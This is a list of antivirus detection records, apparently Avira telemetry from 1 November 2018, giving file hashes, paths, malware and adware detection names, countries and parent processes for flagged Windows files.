  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3794540\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Programs\\FFSetup4.4.0.0.exe', parentsize=66971904, timestamp='2018-11-01T13:27:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9621861\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\aTube_Catcher_1925008174.exe', parentsize=2610712, timestamp='2018-11-01T18:52:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-203311-386f46d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_27ba1ee0\\AVSCAN-20181101-203239-31F7DD1D\\AVSCAN-20181101-203311-386F46D0', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:33:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.vir', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4414197\\MNNStubSetup.VIR', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-01T13:40:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-233040-c11f9f89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be25e36\\AVSCAN-20181031-232508-97335948\\AVSCAN-20181031-233040-C11F9F89', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T06:30:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-211101-3ee3bfc7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-211101-3EE3BFC7', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:10:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='D:\\Temp\\tmp5715971\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Temp\\Bit5D5B.tmp.exe', parentsize=2690240, timestamp='2018-11-01T06:17:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7662165\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3721032, timestamp='2018-11-01T09:46:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6446937\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\aTubeCatcher_0650332926.exe', parentsize=2435998, timestamp='2018-11-01T00:44:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210706-2646c9af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210706-2646C9AF', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:06:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7662165\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Baixaki_utorrent_2968322039.exe', parentsize=2202824, timestamp='2018-11-01T09:46:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2090274\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\aTube_Catcher_2198809117.exe', parentsize=2610712, timestamp='2018-11-01T21:58:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='edcffce6505f9278305fd672dfba3355320f88ca', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\edcffce6505f9278305fd672dfba3355320f88ca', filesize=2048000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='18470b15c8daeab18764cceb5557120baf08283c75441e90f67022132c679b55', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:14:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-102807-b6b24d03', filepath='C:\\Dokumente und Einstellungen\\All Users\\Anwendungsdaten\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-102733-4A2C50FE\\AVSCAN-20181101-102807-B6B24D03', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:28:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='E:\\setup.exe', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:27:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='186c0d95ae9524e96da6e0f987e945d1207ff4df0a1a1fbe45e7f0b453f9fdac', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\186C0D95AE9524E96DA6E0F987E945D1207FF4DF0A1A1FBE45E7F0B453F9FDAC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='186c0d95ae9524e96da6e0f987e945d1207ff4df0a1a1fbe45e7f0b453f9fdac', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:13:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cpp.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\fluent\\ntbin\\win64\\cpp.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='18ac69750e5cfc3f7cf1a42e7c197d738810364bbe4e6a13d3c5518b2a6814e2', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T21:02:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cc.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\fluent\\ntbin\\win64\\cc.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='18ac69750e5cfc3f7cf1a42e7c197d738810364bbe4e6a13d3c5518b2a6814e2', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T12:21:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cpp.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\fluent\\ntbin\\win64\\cpp.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='18ac69750e5cfc3f7cf1a42e7c197d738810364bbe4e6a13d3c5518b2a6814e2', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T12:21:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cc.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\fluent\\ntbin\\win64\\cc.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='18ac69750e5cfc3f7cf1a42e7c197d738810364bbe4e6a13d3c5518b2a6814e2', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T21:02:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='18b6f12272fdfa5d01185479af3d8c3886dd6b477a2d5339399eeceecd6da1c9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries29.10.2018-25.categorizing\\18B6F12272FDFA5D01185479AF3D8C3886DD6B477A2D5339399EECEECD6DA1C9', filesize=1728000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='18b6f12272fdfa5d01185479af3d8c3886dd6b477a2d5339399eeceecd6da1c9', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T08:38:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='delnesec.exe', filepath='C:\\Temp\\DelNESEC.exe', filesize=896000, name='TR/Muldrop.phzie.#M1.#R1'), hash='18c3b3e51d6d955dba0de350125894462d0e2a9518358e9ee6d45e6ce8c419c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\A3000\\ExtInstall\\HEAT_uninstall.exe', parentsize=1947648, timestamp='2018-11-01T14:15:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152226-51eb39ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7a07b621\\AVSCAN-20181101-152136-48B4A2E2\\AVSCAN-20181101-152226-51EB39CE', filesize=896000, name='TR/Muldrop.phzie.#M1.#R1'), hash='18c3b3e51d6d955dba0de350125894462d0e2a9518358e9ee6d45e6ce8c419c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:22:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-152214-a87ad24f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d3ed30d1\\AVSCAN-20181031-152130-A169AC19\\AVSCAN-20181031-152214-A87AD24F', filesize=896000, name='TR/Muldrop.phzie.#M1.#R1'), hash='18c3b3e51d6d955dba0de350125894462d0e2a9518358e9ee6d45e6ce8c419c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:22:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='delnesec.exe', filepath='C:\\Temp\\DelNESEC.exe', filesize=896000, name='TR/Muldrop.phzie.#M1.#R1'), hash='18c3b3e51d6d955dba0de350125894462d0e2a9518358e9ee6d45e6ce8c419c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\A3000\\ExtInstall\\HEAT_uninstall.exe', parentsize=1947648, timestamp='2018-11-01T14:15:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='delnesec.exe', filepath='C:\\Temp\\DelNESEC.exe', filesize=896000, name='TR/Muldrop.phzie.#M1.#R1'), hash='18c3b3e51d6d955dba0de350125894462d0e2a9518358e9ee6d45e6ce8c419c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\A3000\\ExtInstall\\HEAT_uninstall.exe', parentsize=1947648, timestamp='2018-11-01T17:18:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='delnesec.exe', filepath='C:\\temp\\DelNESEC.exe', filesize=896000, name='TR/Muldrop.phzie.#M1.#R1'), hash='18c3b3e51d6d955dba0de350125894462d0e2a9518358e9ee6d45e6ce8c419c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\A3000\\ExtInstall\\HEAT_uninstall.exe', parentsize=1947648, timestamp='2018-11-01T09:49:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='prounstl.exe', filepath='E:\\Softwares\\Gagibite 61M\\Network\\Intel\\PROXGB\\Win32\\NDIS63\\PROUnstl.exe', filesize=368000, name='W32/Sality.AT.#M1.#R1'), hash='18d48af599c5a4f3ca2f3e70974fa1e8273d34815a4483a113040aa1947c08b0', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\SCIENTER\\RestManage\\RestManage.exe', parentsize=3473408, timestamp='2018-11-01T03:17:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='imjpuex.exe', filepath='D:\\Windows.old\\Windows\\System32\\IME\\IMEJP10\\IMJPUEX.EXE', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='18e4ba5868c74225a3927aa15c7c34d9a58107aa1e10517519f54fb6db6a0ab4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T05:37:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sandx.xls', filepath='\\\\?\\E:\\Cong viec\\Hoc vien\\Anh Sơn\\Sân\\SANdx.xls', filesize=1472000, name='X2000M/Agent.20671246.#M1.#R1'), hash='1912e16659b4dd52b8cbeef39005ef2e303680b51d5699fee7b35cf2b9b569f4', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:29:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1941883fc633c8bbebef7d30e9cfec9fcc29dbd588b3eb1dce985bb47e138aa1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\1941883FC633C8BBEBEF7D30E9CFEC9FCC29DBD588B3EB1DCE985BB47E138AA1', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1941883fc633c8bbebef7d30e9cfec9fcc29dbd588b3eb1dce985bb47e138aa1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:50:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gassassinscreedrevelations.exe', filepath='D:\\Black_Box\\Assassins Creed - Revelations\\gAssassinsCreedRevelations.exe', filesize=768000, name='W32/Jeefo.A.#M1.#R1'), hash='1958360734022dc3d75ee5ca3c19e0e7ec68b90d3dd301403ff2baf95c96b631', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T22:40:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1959f5297ad155738ad5ad8d3ec060ed9ea071646f091498e2ea46979d3c2796', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\1959F5297AD155738AD5AD8D3EC060ED9EA071646F091498E2EA46979D3C2796', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1959f5297ad155738ad5ad8d3ec060ed9ea071646f091498e2ea46979d3c2796', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:04:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='drevofirmware.exe', filepath='C:\\Program Files (x86)\\Drevo\\Power Console\\TE88_H0.11_S0.44_181031200811\\DrevoFirmware.exe', filesize=2460000, name='TR/Black.Gen2.#M300.#R100338'), hash='19babc94dff2820e1c233422d3b417249dae5dea4f17e35492a97ff805b9edf9', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Drevo\\Power Console\\Drevo.exe', parentsize=151392, timestamp='2018-11-01T14:24:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142509-7fc7a02c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7415a523\\AVSCAN-20181101-142455-7D045FA5\\AVSCAN-20181101-142509-7FC7A02C', filesize=2460000, name='TR/Black.Gen2.#M1.#R1'), hash='19babc94dff2820e1c233422d3b417249dae5dea4f17e35492a97ff805b9edf9', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:25:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='19bd3265c77b38e8fc6c635284c5fd4447885686a141db52292d2236fc887461', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries29.10.2018-25.categorizing\\19BD3265C77B38E8FC6C635284C5FD4447885686A141DB52292D2236FC887461', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='19bd3265c77b38e8fc6c635284c5fd4447885686a141db52292d2236fc887461', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T08:48:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1a2f9f519698c0279e1d45368462c09d912bf4f0c6ccf200ef8dd4390aa59b31', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1A2F9F519698C0279E1D45368462C09D912BF4F0C6CCF200EF8DD4390AA59B31', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1a2f9f519698c0279e1d45368462c09d912bf4f0c6ccf200ef8dd4390aa59b31', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:19:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='logreader.exe', filepath='E:\\UFIandroid\\Advan\\!Driver & Tools\\Driver Qualcomm\\Qualcomm Driver\\QRD_USB_Drivers\\QCUSBNetworkCombo\\Qualcomm\\1072QRD\\logReader.exe', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='1a4418c9acc85235bcefb6826575a5e8fa2cca25fe7775cbfbfdc83b6ca7e312', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3662232, timestamp='2018-11-01T13:13:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ist.exe', filepath='\\\\?\\C:\\11\\Internet Secure Tunneling 2.0.0.244\\1\\Ist.exe', filesize=852000, name='TR/Crypt.XPACK.Gen.#M300.#R471'), hash='1a59ca13c65517a7f07e3d05c6b810d7b62ab2231708273e90c83f1fe710547b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:07:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ไหมไทย ใจตะวัน - ชุดนักสู้หัวใจเซิ้ง.exe', filepath='E:\\music\\music\\ลูกทุ่ง โดนจาย\\ไหมไทย ใจตะวัน - ชุดนักสู้หัวใจเซิ้ง\\ไหมไทย ใจตะวัน - ชุดนักสู้หัวใจเซิ้ง.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='1a7eee5eeac20a75ec2ddd680ae478bdd7928d74e3707c78f29dc84f1b37b3d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='copy of copy of spideypc.exe', filepath='\\\\?\\H:\\العاب\\اسبيدر مان\\Copy of Copy of SpideyPC.exe', filesize=1536000, name='TR/Patched.Gen.#M300.#R3367'), hash='1b118927a5b652abb85d789b0dd356247c20482c2b1367bff13807d1d1482f8c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:09:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='102613014533326.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\102613014533326.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:32:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='150774176925071.exe', filepath='\\\\?\\C:\\Temp\\150774176925071.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='166332716931094.exe', filepath='\\\\?\\C:\\Temp\\166332716931094.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='166332716931094.exe', filepath='\\\\?\\C:\\Temp\\166332716931094.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='150774176925071.exe', filepath='\\\\?\\C:\\Temp\\150774176925071.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='402793959738212.exe', filepath='\\\\?\\C:\\Temp\\402793959738212.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:18:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='402793959738212.exe', filepath='\\\\?\\C:\\Temp\\402793959738212.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:18:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='399413336734193.exe', filepath='\\\\?\\C:\\Temp\\399413336734193.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:18:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='399413336734193.exe', filepath='\\\\?\\C:\\Temp\\399413336734193.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:18:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='199053535918533.exe', filepath='\\\\?\\C:\\Temp\\199053535918533.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:15:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='199053535918533.exe', filepath='\\\\?\\C:\\Temp\\199053535918533.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:15:15Z'), dt=datetime.date(2018, 11, 1)),
